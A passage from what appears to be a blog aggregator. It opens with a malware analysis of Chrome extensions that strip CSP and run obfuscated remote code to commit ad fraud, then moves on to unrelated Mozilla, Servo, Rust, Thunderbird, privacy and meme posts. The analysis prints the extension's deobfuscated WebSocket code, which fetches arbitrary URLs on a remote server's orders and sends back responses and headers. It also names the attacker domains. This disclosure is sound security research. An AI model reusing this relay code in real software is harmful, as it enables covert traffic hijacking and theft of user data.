No surprise here, this is about removing Content Security Policy protection from all websites, making sure it doesn’t interfere when the extension injects its code into web pages.

As I already mentioned, the core key of the response is "onreset", an essential component towards executing the JavaScript code. And the JavaScript code in the info key is heavily obfuscated by JavaScript Obfuscator, with most strings and property names encrypted to make reverse engineering harder.

Of course this kind of obfuscation can still be reversed, and you can see the entire deobfuscated code here. Note that most function and variable names have been chosen randomly, the original names being meaningless. The code consists of three parts:

  1. Marshalling of various extension APIs: tabs, storage, declarativeNetRequest. This uses DOM events to communicate with the function f() mentioned above, this function forwards the messages to the extension’s background worker and the worker then calls the respective APIs.

    In principle, this allows reading out your entire browser state: how many tabs, what pages are loaded etc. Getting notified on changes is possible as well. The code doesn’t currently use this functionality, but the server can of course produce a different version of it any time, for all users or only for selected targets.

    There is also another aspect here: in order to run remote code, this code has been moved into the website realm. This means however that any website can abuse these APIs as well. It’s only a matter of knowing which DOM events to send. Yes, this is a massive security issue.

  2. Code downloading a 256 KiB binary blob from https://st.internetdownloadmanager.top/bff and storing it in encoded form as bff key in the extension storage. No, this isn’t your best friend forever but a Bloom filter. This filter is applied to SHA-256 hashes of domain names and determines on which domain names the main functionality should be activated.

    With Bloom filters, it is impossible to determine which exact data went into it. It is possible however to try out guesses, to see which one it accepts. Here is the list of matching domains that I could find. This list looked random to me initially, and I even suspected that noise has been added to it in order to hide the real target domains. Later however I could identify it as the list of adindex advertisers, see below.

  3. The main functionality: when active, it sends the full address of the current page to https://st.internetdownloadmanager.top/cwc2 and might get a “session” identifier back. It is likely that this this server stores the addresses it receives and sells the resulting browsing history. This part of the functionality stays hidden however.

    The “session” handling is visible on the other hand. There is some rate limiting here, making sure that this functionality is triggered at most once per minute and no more than once every 12 hours for each domain. If activated, a message is sent back to the extension’s background worker telling it to connect to wss://pa.internetdownloadmanager.top/s/<session>. All further processing happens there.

The “session” handling

Here we are back in the extension’s static code, no longer remotely downloaded code. The entry point for the “session” handling is function __create. Its purpose has been concealed, with some essential property and method names contained in the obfuscated code above or received from the web socket connection. I filled in these parts and simplified the code to make it easier to understand:

var __create = url => {
  const socket = new this.WebSocket(url);
  const buffer = {};
  socket.onmessage = event => {
    let message = event.data.arrayBuffer ? event.data : JSON.parse(event.data);
    this.stepModifiedMatcher(socket, buffer, message)
  };
};

stepModifiedMatcher =
  async (socket, buffer, message) => {
    if (message.arrayBuffer)
      buffer[1] = message.arrayBuffer();
    else {
      let [url, options] = message;
      if (buffer[1]) {
        options.body = await buffer[1];
        buffer[1] = null;
      }

      let response = await this.fetch(url, options);
      let data = await Promise.all([
        !message[3] ? response.arrayBuffer() : false,
        JSON.stringify([...response.headers.entries()]),
        response.status,
        response.url,
        response.redirected,
      ]);
      for (const entry of data) {
        if (socket.readyState === 1) {
          socket.send(entry);
        }
      }
    }
  };

This receives instructions from the web socket connection on what requests to make. Upon success the extension sends information like response text, HTTP headers and HTTP status back to the server.

What is this good for? Before I could observe this code in action I was left guessing. Is this an elaborate approach to de-anonymize users? On some websites their name will be right there in the server response. Or is this about session hijacking? There would be session cookies in the headers and CSRF tokens in the response body, so the extension could be instrumented to perform whatever actions necessary on behalf of the attackers – like initiating a money transfer once the user logs into their PayPay account.

The reality turned out to be far more mundane. When I finally managed to trigger this functionality on the Ashley Madison website, I saw the extension perform lots of web requests. Apparently, it was replaying a browsing session that was recorded two days earlier with the Firefox browser. The entry point of this session: https://api.sslcertifications.org/v1/redirect?advertiserId=11EE385A29E861E389DA14DDA9D518B0&adspaceId=11EE4BCA2BF782C589DA14DDA9D518B0&customId=505 (redirecting to ashleymadison.com).

Developer Tools screenshot, listing a number of network requests. It starts with ashleymadison.com and loads a number of JavaScript and CSS files as well as images. All requests are listed as fetch requests initiated by background.js:361.

The server handling api.sslcertifications.org belongs to the German advertising company adindex. Their list of advertisers is mostly identical to the list of domains matched by the Bloom filter the extension uses. So this is ad fraud: the extension generates fake link clicks, making sure its owner earns money for “advertising” websites like Ashley Madison. It uses the user’s IP address and replays recorded sessions to make this look like legitimate traffic, hoping to avoid detection this way.

I contacted adindex and they confirmed that sslcertifications.org is a domain registered by a specific publisher but handled by adindex. They also said that they confronted the publisher in question with my findings and, having found their response unsatisfactory, blocked this publisher. Shortly afterwards the internetdownloadmanager.top domain became unreachable, and api.sslcertifications.org site no longer has a valid SSL certificate. Domains related to other extensions, the ones I didn’t mention in my request, are still accessible.

Who is behind these extensions?

The adindex CEO declined to provide the identity of the problematic publisher. There are obvious data protection reasons for that. However, as I looked further I realized that he might have additional reasons to withhold this information.

While most extensions I list provide clearly fake names and addresses, the Auto Quality for YouTube™ extension is associated with the MegaXT website. That website doesn’t merely feature a portfolio of two browser extensions (the second one being an older Manifest V2 extension also geared towards running remote code) but also a real owner with a real name. Who just happens to be a developer at adindex.

There is also the company eokoko GmbH, developing Auto Resolution Quality for YouTube™ extension. This extension appears to be non-malicious at the moment, yet it shares a number of traits with the malicious extensions on my list. Director of this company is once again the same adindex developer.

And not just any developer. According to his website he used to be CTO at adindex in 2013 (I couldn’t find an independent confirmation for this). He also founded a company together with the adindex CEO in 2018, something that is confirmed by public records.

When I mentioned this connection in my communication with adindex CEO the response was:

[He] works for us as a freelancer in development. Employees (including freelancers) are generally not allowed to operate publisher accounts at adindex and the account in question does not belong to [this developer]. Whether he operates extensions is actually beyond my knowledge.

I want to conclude this article with some assorted history facts:

  • The two extensions associated with MegaXT have been running remote code since at least 2021. I don’t know whether they were outright malicious from the start, this would be impossible to prove retroactively even with source code given that they simply loaded some JavaScript code into the extension context. But both extensions have reviews complaining about malicious functionality going back to 2022.
  • Darktheme for google translate and Download Manager Integration Checklist extensions both appear to have changed hands in 2024, after which they requested more privileges with an update in October 2024.
  • Download Manager Integration Checklist extension used to be called “IDM Integration Module” in 2022. There have been at least five more extensions with similar names (not counting the official one), all removed from Chrome Web Store due to “policy violation.” This particular extension was associated with a website which is still offering “cracks” that show up as malware on antivirus scans (the installation instructions “solve” this by recommending to turn off antivirus protection). But that’s most likely the previous extension owner.
  • Convert PDF to JPEG/PNG appears to have gone through a hidden ownership change in 2024, after which an update in September 2024 requested vastly extended privileges. However, the extension has reviews complaining about spammy behavior going back to 2019.

Mozilla Performance BlogPerformance Testing Newsletter (Q4 Edition)

Welcome to the latest edition of the Performance Testing Newsletter! The PerfTools team empowers engineers with tools to continuously improve the performance of Mozilla products. See below for highlights from the changes made in the last quarter.

This quarter also saw the release of perf.compare! It’s a new tool used for making comparisons between try runs (or other pushes). It is now the default comparison tool used for these comparisons and replaces the Compare View that was in use previously. Congratulations to all the folks involved in making this release happen! Feel free to reach out in #perfcompare on Matrix if there are any questions, feature requests, etc.. Bugs can be filed in Testing :: PerfCompare.

Highlights from Contributors

PerfCompare

Profiler

Perftest

Highlights from Rest of the Team

Blog Posts ✍️

Contributors

If you have any questions, or are looking to add performance testing for your code component, you can find us in #perftest on Element, or #perf-help on Slack.

The Servo BlogServo in 2024: stats, features and donations

Two years after the renewed activity on the project we can confirm that Servo is fully back.

If we ignore the bots, in 2024 we’ve had 129 unique contributors (+143% over 54 last year), landing 1,771 pull requests (+163% over 673), and that’s just in our main repo!

Including bots, the total number of PRs merged goes up to 2,674 (+144% over 1094). From all this work, 26% of the PRs were made by Igalia, 40% by other contributors and the rest by the bots (34%). This shows how the Servo community has been growing and becoming more diverse with new actors participating actively in the project.

2018 2019 2020 2021 2022 2023 2024
Merged PRs 1,188 986 669 118 65 776 1,771
Unique contributors 142 141 87 37 20 54 129
Average unique contributors per month 27.33 27.17 14.75 4.92 2.83 11.33 26.33

Now let’s take a look to the data and chart above, which show the evolution since 2018 in number of merged PRs, unique contributors per year and average contributors per month (excluding bots). We can see the project is back to numbers of 2018 and 2019 when it was been developed in full speed!

It’s worth noting that Servo popularity keeps growing, with many folks realizing there has been new activity on the project last year, and we have more and more people interested in the project.

Servo GitHub start history chart showing Servo not stopping going up since 2013, up to more than 25,000 today <figcaption>Servo GitHub stars haven't stopped growing, surpassing now 25K threshold.</figcaption>

During 2024 Servo has been present in 8 events with 9 talks: FOSDEM, Open Source Summit North America, Seattle Rust user meetup, GOSIM Europe, Global Software Technology Summit, Linux Foundation Europe Member Summit, GOSIM China, Ubuntu Summit.

If we focus on development there has been many things moving forward during the year. Servo main dependencies (SpiderMonkey, Stylo and WebRender) have been upgraded, the new layout engine has kept evolving adding support for floats, tables, flexbox, fonts, etc. By the end of 2024 Servo passes 1,515,229 WPT subtests (79%). Many other new features have been under active development: WebGPU, Shadow DOM, ReadableStream, WebXR, … Servo now supports two new platforms: Android and OpenHarmony. And we have got the first experiments of applications using Servo as a web engine (like Tauri, Blitz, QtWebView, Cuervo, Verso and Moto).

In 2024 we have raised 33,632.64 USD with donations via Open Collective and GitHub Sponsors from 500 different people and organizations. Thank you all for supporting us!

With this money we have now 3 servers that provides self-hosted runners for Linux, macOS, and Windows reducing our build times from over an hour to under 30 minutes.

Talking about the future, the Servo TSC has been discussing the roadmap for 2025 which has been updated on the Servo’s wiki. We have many plans to keep Servo thriving with new features and improvements. Let’s hope for a great 2025!

Mozilla ThunderbirdVIDEO: The Thunderbird Mobile Team

The Thunderbird Mobile team are crafting the newest chapter of the Thunderbird story. In this month’s office hours, we sat down to chat with the entire mobile team! This includes Philipp Kewisch, Sr. Manager of Mobile Engineering (and long-time Thunderbird contributor), and Sr. Software Engineers cketti and Wolf Montwé (long-time K-9 Mail maintainer and developer, respectively). We talk about the journey from K-9 Mail to Thunderbird for Android, what’s new and what’s coming in the near future, and the first steps towards Thunderbird on your iOS devices!

Next month, we’ll be chatting with Laurel Terlesky, Manager of the UI/UX Design Studio! She’ll be sharing her FOSDEM talk, “Thunderbird: Building a Cross-Platform, Scalable Open-Source Design System.” It’s been a while since we’ve chatted with the design team, and it will be great to see what they’re working on.

January Office Hours: The Thunderbird Mobile Team

In June 2022, we announced that K-9 Mail would be joining the Thunderbird family, and would ultimately become Thunderbird for Android. After two years of development, the first beta release of Thunderbird for Android debuted in October 2024, shortly followed by the first stable release. Since then, over 200 thousand users have downloaded the app, and we’ve gotten some very nice reviews in ZDNet and Android Authority. If you haven’t tried us on your Android device yet, now is a great time! And if, like some of us, you’re waiting for Thunderbird to come to your iPhone or iPad, we have some exciting news at the end of our talk.

Want to know more about the Android development process and find out what’s coming soon to the app? Want the first look into our plans for Thunderbird on iOS? Let our mobile team guests provide the answers!

Watch, Read, and Get Involved

We’re so grateful to Philipp, cketti, and Wolf for joining us! We hope this video helps explain more about Thunderbird on Android (and eventually iOS), and encourages you to download the app if you haven’t already. If you’re a regular user, we hope you consider contributing code, translations, or support. And if you’re an iOS developer, we hope you consider joining our team!

VIDEO (Also on Peertube):

Thunderbird for Android Resources:

The post VIDEO: The Thunderbird Mobile Team appeared first on The Thunderbird Blog.

Niko MatsakisPreview crates

This post lays out the idea of preview crates.1 Preview crates would be special crates released by the rust-lang org. Like the standard library, preview crates would have access to compiler internals but would still be usable from stable Rust. They would be used in cases where we know we want to give users the ability to do X but we don’t yet know precisely how we want to expose it in the language or stdlib. In git terms, preview crates would let us stabilize the plumbing while retaining the ability to iterate on the final shape of the porcelain.

Nightly is not enough

Developing large language features is a tricky business. Because everything builds on the language, stability is very important, but at the same time, there are some questions that are very hard to answer without experience. Our main tool for getting this experience has been the nightly toolchain, which lets us develop, iterate, and test features before committing to them.

Because the nightly toolchain comes with no guarantees at all, however, most users who experiment with it do so lightly, just using it for toy projects and the like. For some features, this is perfectly fine, particularly syntactic features like let-else, where you can learn everything you need to know about how it feels from a single crate.

Nightly doesn’t let you build a fledgling ecosystem

Where nightly really fails us though is the ability to estimate the impact of a feature on a larger ecosystem. Sometimes you would like to expose a capability and see what people build with it. How do they use it? What patterns emerge? Often, we can predict those patterns in advance, but sometimes there are surprises, and we find that what we thought would be the default mode of operation is actually kind of a niche case.

For these cases, it would be cool if there were a way to issue a feature in “preview” mode, where people can build on it, but it is not yet released in its final form. The challenge is that if we want people to use this to build up an ecosystem, we don’t want to disturb all those crates when we iterate on the feature. We want a way to make changes that lets those crates keep working until the maintainers have time to port to the latest syntax, naming, or whatever.

Editions are closer, but not quite right

The other tool we have for correct mistakes is editions. Editions let us change what syntax means and, because they are opt-in, all existing code continues to work.

Editions let us fix a great many things to make Rust more self-consistent, but they carry a heavy cost. They force people to relearn how things in Rust work. The make books oudated. This price is typically too high for us to ship a feature knowing that we are going to change it in a future edition.

Let’s give an example

To make this concrete, let’s take a specific example. The const generics team has been hard at work iterating on the meaning of const trait and in fact there is a pending RFC that describes their work. There’s just one problem: it’s not yet clear how it should be exposed to users. I won’t go into the rationale for each choice, but suffice to say that there are a number of options under current consideration. All of these examples have been proposed, for example, as the way to say “a function that can be executed at compilation time which will call T::default”:

  • const fn compute_value<T: ~const Default>()
  • const fn compute_value<T: const Default>()
  • const fn compute_value<T: Default>()

At the moment, I personally have a preference between these (I’ll let you guess), but I figure I have about… hmm… 80-90% confidence in that choice. And what’s worse, to really decide between them, I think we have to see how the work on async proceeds, and perhaps also what kinds of patterns turn out to be common in practice for const fn. This stuff is difficult to gauge accurately in advance.

Enter preview crates

So what if we released a crate rust_lang::const_preview. In my dream world, this is released on crates.io, using the namespaces described in [RFC #3243][https://rust-lang.github.io/rfcs/3243-packages-as-optional-namespaces.html]. Like any crate, const_preview can be versioned. It would expose exactly one item, a macro const_item that can be used to write const functions that have const trait bounds:

const_preview::const_item! {
    const fn compute_value<T: ~const Default>() {
        // as `~const` is what is implemented today, I'll use it in this example
    }
}

Interally, this const_item! macro can make use of internal APIs in the compiler to parse the contents and deploy the special semantics.

Releasing v2.0

Now, maybe we use this for a while, and we find that people really don’t like the ~, so we decide to change the syntax. Perhaps we opt to write const Default instead of ~const Default. No problem, we release a 2.0 version of the crate and we also rewrite 1.0 to take in the tokens and invoke 2.0 using the semver trick.

const_preview::const_item! {
    const fn compute_value<T: const Default>() {
        // as `~const` is what is implemented today, I'll use it in this example
    }
}

Integrating into the language

Once we decide we are happy with const_item! we can merge it into the language proper. The preview crates are deprecated and simply desugar to the true language syntax. We all go home, drink non-fat flat whites, and pat ourselves on the back.

User-based experimentation

One thing I like about the preview crates is that then others can begin to do their own experiments. Perhaps somebody wants to try out what it would be like it T: Default meant const by default–they can readily write a wrapper that desugars to const_preview::const_item and try it out. And people can build on it. And all that code keeps working once we integrate const functions into the language “for real”, it just looks kinda dated.

Frequently asked questions

Why else might we use previews?

Even if we know the semantics, we could use previews to stabilize features where the user experience is not great. I’m thinking of Generic Associated Types as one example, where the stabilization was slowed because of usability concerns.

What are the risks from this?

The previous answers hints at one of my fears… if preview crates become a widespread way for us to stabilize features with usability gaps, we may accumulate a very large number of them and then never move those features into Rust proper. That seems bad.

Shouldn’t we just make a decision already?

I mean…maybe? I do think we are sometimes very cautious. I would like us to get better at leaning on our judgment. But I also seem that sometimes there is a tension between “getting something out the door” and “taking the time to evaluate a generalization”, and it’s not clear to me that this tension is an inherent complexity or an artificial artifact of the way we do business.

But would this actually work? What’s in that crate and what if it is not matched with the right version of the compiler?

One very special thing about libstd is that it is released together with the compiler and hence it is able to co-evolve, making use of internal APIs that are unstable and change from release to release. If we want to put this crate on crates.io, it will not be able to co-evolve in the same way. Bah. That’s annoying! But I figure we still handle it by actually having the preview functionality exposed by crates in sysroot that are shipping along the compiler. These crates would not be directly usable except by our blessed crates.io crates, but they would basically just be shims that expose the underlying stuff. We could of course cut out the middleman and just have people use those preview crates directly– but I don’t like that as much because it’s less obvious and because we can’t as easily track reverse dependencies on crates.io to evaluate usage.

A macro seems heavy weight! What other options have you considered?

I also considered the idea of having p# keywords (“preview”), so e.g.

#[allow(preview_feature)]
p#const fn compute_value<T: p#const Default>() {
    // works on stable
}

Using a p# keyword would fire off a lint (preview_feature) that you would probably want to allow.

This is less intrusive, but I like the crate idea better because it allows us to release a v2.0 of the p#const keyword.

What kinds of things can we use preview crates for?

Good question. I’m not entirely sure. It seems like APIs that require us to define new traits and other things would be a bit tricky to maintain the total interoperability I think we want. Tools like trait aliases etc (which we need for other reasons) would help.

Who else does this sort of thing?

Ember has formalized this “plumbing first” approach in their version of editions. In Ember, from what I understand, an edition is not a “time-based thing”, like in Rust. Instead, it indicates a big shift in paradigms, and it comes out when that new paradigm is ready. But part of the process to reaching an edition is to start by shipping core APIs (plumbing APIs) that create the new capabilities. The community can then create wrappers and experiment with the “porcelain” before the Ember crate enshrines a best practice set of APIs and declares the new Edition ready.

Java has a notion of preview features, but they are not semver guaranteed to stick around.

I’m not sure who else!

Could we use decorators instead?

Usability of decorators like #p[const_preview::const_item] is better, particularly in rust-analyzer. The tricky bit there is that decorates can only be applied to valid Rust syntax, so it implies we’d need to extend the parser to include things like ~const forever, whereas I might prefer to have that complexity isolated to the const_preview crate.

So is this a done deal? Is this happening?

I don’t know! People often think that because I write a blog post about something it will happen, but this is currently just in “early ideation” stage. As I’ve written before, though, I continue to feel that we need something kind of “middle state” for our release process (see e.g. this blog post, Stability without stressing the !@#! out), and I think preview crates could be a good tool to have in our toolbox.


  1. Hat tip to Yehuda Katz and the Ember community, Tyler Mandry, Jack Huey, Josh Triplett, Oli Scherer, and probably a few others I’ve forgotten with whom I discussed this idea. Of course anything you like, they came up with, everything you hate was my addition. ↩︎

Mozilla Localization (L10N)2025 Pontoon survey results

The results from the 2025 Pontoon survey are in and the 3 top-voted features we commit to implement are:

  1. Add ability to preview Fluent strings in the editor (258 votes).
  2. Keep unsaved translations when navigating to other strings (252 votes).
  3. Hint at any available variants when referencing message (229 votes).

The remaining features ranked as follows:

  1. Add virtual keyboard with special characters to the editor (226 votes).
  2. Link project names in Concordance search results to corresponding strings (223 votes).
  3. Add a batch action to pretranslate a selection of strings (218 votes).
  4. Add ability to edit and remove comments (216 votes).
  5. Enable use of generic machine translation engines with pretranslation (209 votes).
  6. Add ability to report comments and suggestions for abusive content (193 votes).
  7. Add “Copy translation from another locale as suggestion” batch action (186 votes).

We thank everyone who dedicated their time to share valuable responses and suggest potential features for us to consider implementing!

Each user could give each feature 1 to 5 votes. A total of 154 Pontoon users participated in the survey, 68 of which voted on all features. The number of participants is lower than in the past years, since we only reached out to users who explicitly opted-in to email updates.

We look forward to implementing these new features and working towards a more seamless and efficient translation experience with Pontoon. Stay tuned for updates!

This Week In RustThis Week in Rust 584

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tag us at @ThisWeekInRust on X (formerly Twitter) or @ThisWeekinRust on mastodon.social, or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub and archives can be viewed at this-week-in-rust.org. If you find any errors in this week's issue, please submit a PR.

Want TWIR in your inbox? Subscribe here.

Updates from Rust Community

Official
Foundation
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs

Crate of the Week

This week's crate is embed_it, a crate that helps you to embed assets into your binary and generates structs / trait implementations for each file or directory.

Thanks to Riberk for the self-suggestion!

Please submit your suggestions and votes for next week!

Calls for Testing

An important step for RFC implementation is for people to experiment with the implementation and give feedback, especially before stabilization. The following RFCs would benefit from user testing before moving forward:

RFCs
  • No calls for testing were issued this week.
Rust
  • No calls for testing were issued this week.
Rustup
  • No calls for testing were issued this week.

If you are a feature implementer and would like your RFC to appear on the above list, add the new call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.

RFCs
Rust
Rustup

If you are a feature implementer and would like your RFC to appear on the above list, add the new call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.

Call for Participation

CFP - Projects

Always wanted to contribute to open-source projects but did not know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here or through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

CFP - Events

Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.

If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

Updates from the Rust Project

408 pull requests were merged in the last week

Rust Compiler Performance Triage

Relatively quiet week, with one large-ish regression that will be reverted. #132666 produced a nice perf. win, by skipping unnecessary work. This PR actually reversed a regression caused by a previous PR.

Triage done by @kobzol.

Revision range: 9a1d156f..f7538506

Summary:

(instructions:u) mean range count
Regressions ❌
(primary)
0.5% [0.2%, 2.2%] 42
Regressions ❌
(secondary)
2.1% [0.1%, 11.6%] 56
Improvements ✅
(primary)
-0.8% [-4.2%, -0.1%] 107
Improvements ✅
(secondary)
-1.2% [-4.0%, -0.1%] 77
All ❌✅ (primary) -0.5% [-4.2%, 2.2%] 149

2 Regressions, 3 Improvements, 2 Mixed; 4 of them in rollups 45 artifact comparisons made in total

Full report here.

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

  • No RFCs were approved this week.
Final Comment Period

Every week, the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
  • No RFCs entered Final Comment Period this week.
Tracking Issues & PRs
Rust Cargo
  • No Cargo Tracking Issues or PRs entered Final Comment Period this week.
Language Team
  • No Language Team Proposals entered Final Comment Period this week.
Language Reference
  • No Language Reference RFCs entered Final Comment Period this week.
Unsafe Code Guidelines
  • No Unsafe Code Guideline Tracking Issues or PRs entered Final Comment Period this week.
New and Updated RFCs
  • No New or Updated RFCs were created this week.

Upcoming Events

Rusty Events between 2025-01-29 - 2025-02-26 🦀

Virtual
Asia
Europe
North America
Oceania

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Jobs

Please see the latest Who's Hiring thread on r/rust

Quote of the Week

I have experience in multiple styles of MMA gained from fighting the borrow checker, if that counts.

Richard Neumann on rust-users

Thanks to Jonas Fassbender for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, cdmistman, ericseppanen, extrawurst, U007D, joelmarcey, mariannegoldin, bennyvasquez, bdillo

Email list hosting is sponsored by The Rust Foundation

Discuss on r/rust

Don Martitime to sharpen your pencils, people

Mariana Olaizola Rosenblat covers How Meta Turned Its Back on Human Rights for Tech Policy Press. Zuckerberg announced that his company will no longer work to detect abuses of its platforms other than high-severity violations of content policy, such as those involving illicit drugs, terrorism, and child sexual exploitation. The clear implication is that the company will no longer strive to police its platform against other harmful content, including hate speech and targeted harassment.

Sounds like a brand-unsafe environment. So is another rush of advertiser boycott stories coming? Not this time. Lara O’Reilly reports that brand safety has recently become a political hot potato and been a flash point for some influential, right-leaning figures. In uncertain times, marketing decision-makers are keeping a low profile. Most companies aren’t really set up to take on the open-ended security risk of coming out against hate speech by users with friends in high places. According to the Fraternal Order of Police, the January 6 pardons send a dangerous message, and that message is being heard in marketing departments. The CMOs who boycotted last time are fully aware that stochastic terrorism is a thing, and that rage stories about companies spread quickly in Facebook groups and other extremist media. If an executive makes the news for pulling ads from Meta, they would be putting employees at risk from lone, deniable attacks. So instead of announcing a high-profile boycott, marketers are more likely to follow the example of Federal employees and do the right thing, by the book, and quietly.

Fortunately, big advertisers got some lower-stakes practice with the X (former Twitter) situation. Instead of either (1) staying on there and putting the brand at risk of being associated with material copied out of Henry Ford’s old newspaper or (2) risking getting snarled up in a lawsuit for pulling the X ads entirely, brands got the best of both by cutting way back on the actual money without dropping X entirely or saying much one way or the other.

And it’s possible for advertisers to reduce support for Meta without making a stink or drawing fire. Fortunately, Meta ads are hella expensive, and results can be unrealistic and unsustainable. Like all the Big Tech companies these days, Meta is coping with a slowdown in innovation by tweaking the ad rules to capture more revenue from existing services. As Jakob Nielsen pointed out back in 2006, in Search Engines as Leeches on the Web, ad platforms can even capture the value created by others. A marketer doesn’t have to shout ¡No Pasarán! or anything—just sharpen your best math pencil, quietly go through the numbers, spot something that looks low-ROAS or fraudulent in the Meta column, tweak the budget, repeat. If users can dial down Meta, so can marketers. (Update: Richard Kirk writes, Brands could be spending three times too much on social. You read that right. Read the math, do the math.) And if Meta comes out with something new and risky like the adfraud in the browser thing, Privacy-Preserving Attribution, it’s easy to use the fraud problem as the reason not to do it—you don’t have to stand up and talk politics at work.

From the user side

It’s not that hard to take privacy measures that result in less money for Big Tech. Even if you can’t quit Meta entirely, some basic tools and settings can make an impact, especially if you use both a laptop and a phone, not just a phone. With a few minutes of work, an individual in the USA can, in effect, fine the surveillance business about $50/month.

My list of effective privacy tips is prioritized by how much I think they’ll cost the surveillance business per minute spent. A privacy tips list for people who don’t like doing privacy tips but also don’t like creepy oligarchs. (As they say in the clickbait business, number 9 will shock you: if you get your web browser info from TV and social media, you probably won’t guess which browsers have built-in surveillance and/or fraud features.) That page also has links to more intensive privacy advice for those who want to get into it.

A lawyer question

As an Internet user, I realize I can’t get to Meta surveillance neutral just with my own privacy tools and settings. For the foreseeable future, companies are going to be doing server-to-server tracking of me with Meta CAPI.

So in order to get to a rough equivalent of not being surveilled, I need to balance out their actual surveillance by introducing some free speech into the system. (And yes, numbers can be speech. O, the Tables tell!) So what I’d like to do is write a surrogate script (that can be swapped in by a browser extension in place of the real Meta Pixel, like the surrogate scripts uBlock Origin uses) to enable the user to send something other than valid surveillance data. The user would configure what message the script would send. The surrogate script would then encode the message and pass it to Meta in place of the surveillance data sent by the original Meta script. There is a possible research angle to this, since I think that in general, reducing ad personalization tends to help people buy better products and services. An experiment would probably show that people who mess with cross-context surveillance are happier with their purchases than those who allow surveillance. Releasing a script like that is the kind of thing I could catch hell for, legally, so I’m going to wait to write it until I can find a place to host it and a lawyer to represent me. Anyone?

Related

Big Tech platforms: mall, newspaper, or something else?

Sunday Internet optimism

Bonus links

After Big Social. Dan Phiffer covers the question of where to next. I am going into this clear-eyed; I’m going to end up losing touch with a lot of people. For many of my contacts, Meta controls the only connection we have. It’s a real loss, withdrawing from communities that I’ve built up over the years (or decades in the case of Facebook). But I’m also finding new communities with different people on the networks I’m spending more time in.

No Cookies For You!: Evaluating The Promises Of Big Tech’s ‘Privacy-Enhancing’ Techniques Kirsten Martin, Helen Nissenbaum, and Vitaly Shmatikov cover the problems with privacy-enhancing Big Tech features. (Not everything with privacy in its name is a privacy feature. It’s like open I guess.)

The Mozilla BlogIYKYK: The secret language of memes

A meme-style image featuring a man looking back in surprise while his female companion gestures in disbelief, overlaid with colorful speech bubbles saying "IKR?" and emoji-style icons.

A smiling woman with long dark hair, wearing colorful earrings and a navy blue polka dot top, in front of a turquoise background.
Dr. Erica Brozovsky is a sociolinguist, a public scholar and a lover of words. She is the host of Otherwords, a PBS series on language and linguistics, and a professor of writing and rhetoric at Worcester Polytechnic Institute. You can find her at @ericabrozovsky on most platforms. Photo: Kelly Zhu

If you’ve been on the internet anytime in the past 25 years, there’s a good chance you’ve seen a meme, shared a meme, or perhaps even created a meme. From the LOLcats and Advice Animals of the mid 2000s to the many emotions of Moo Deng, the world’s favorite pygmy hippopotamus, internet memes allow us to share pieces of media that we find funny, ironic or relatable.

Author Mike Godwin coined the term “internet meme” in the June 1993 edition of Wired magazine. However, that wasn’t the advent of the word meme. In his 1976 book, “The Selfish Gene,” evolutionary biologist Richard Dawkins conceived the term to represent “ideas, behaviors, or styles that spread from person to person.” If you think that sounds a bit contagious, you’re absolutely correct. Much as contagion spreads, so does the imitation of ideas in the form of memes, circulating humor across society.

But who claims the crown of first ever internet meme? Is it the 1998 Hamster Dance gif created by ​​Deidre LaCarte as a GeoCities page?

Or is it the 1996 Autodesk Dancing Baby that has now become an NFT? (Creator Michael Girard claims so.)

Those definitely went viral, but are they memes? Perhaps not. A funny image (or gif or video) is just a funny image… or gif, or video… unless it achieves the two keys to memehood: inspiring creative variations (that are then copied and spread) and being imbued with cultural context, like that Pepperidge Farm meme (iykyk).

The Cow Guide, for example, might be considered a precursor to the internet meme.

Full of ASCII character drawings of variations on cows, The Cow Guide spread on Usenet in the ‘80s and ‘90s (pre-World Wide Web), with people adding new cows with every repost. While memes do exist offline, internet memes really took off in the 2000s within anonymous web communities like 4chan — which required images with each post — and Reddit and Tumblr, which debuted in 2003, 2005, and 2007, respectively. In the late aughts, internet curators like BuzzFeed and social media sites made memes more mainstream. And now they’re everywhere.

Meme culture is so quick, with turnaround and multiple iterations within minutes of an event happening. Even if the source material is a real and consequential topic, a funny meme brings attention, as humor and levity travels further and faster than seriousness and sincerity. 

Global and national events (like the Olympics and the U.S. presidential election) are goldmines for meme-able opportunities that allow information to spread faster than the traditional news cycle. Take, for instance, Stephen Nedoroscik, Team USA’s horse powerhouse, who became the subject of countless memes for his incredible performance and comparisons to Clark Kent.

But how is it that memes are significant enough to have given rise to an entire academic field — memetics — and a category in the Library of Congress? The U.K.’s National Science and Media Museum is even putting this absolute unit on display as their first “digitally-born object.”

Are memes useful for more than just laughs or, more realistically, those small exhales through the nose of mild amusement?

Definitively, yes. Here’s a comparison: A minute is a unit of time, a meter is a unit of measure, and a meme is a unit of culture. Today internet memes (which we’ll just call memes) can be described as “units of popular culture that are circulated, imitated, and transformed by internet users, creating a shared cultural experience.” The key part of that definition is the creation of a shared cultural experience. That seems pretty deep for something so trivial as a reaction GIF or silly picture with text slapped on it, but it’s true. 

Think of it this way: Have you ever made a reference, maybe to a movie, a song lyric, a book or a funny TikTok you saw, only to be met with silence or questioning looks from the group you’re talking to? When even just one other person gets the reference, you feel a sense of kinship; you know the two of you have something in common. This is what happens with memes. The internet is so vast now that we’re not all part of the same communities online, so when you “get” a meme, there’s a shared sense of humor and a feeling of belonging. And laughing together strengthens relationships and fosters community, making you feel close

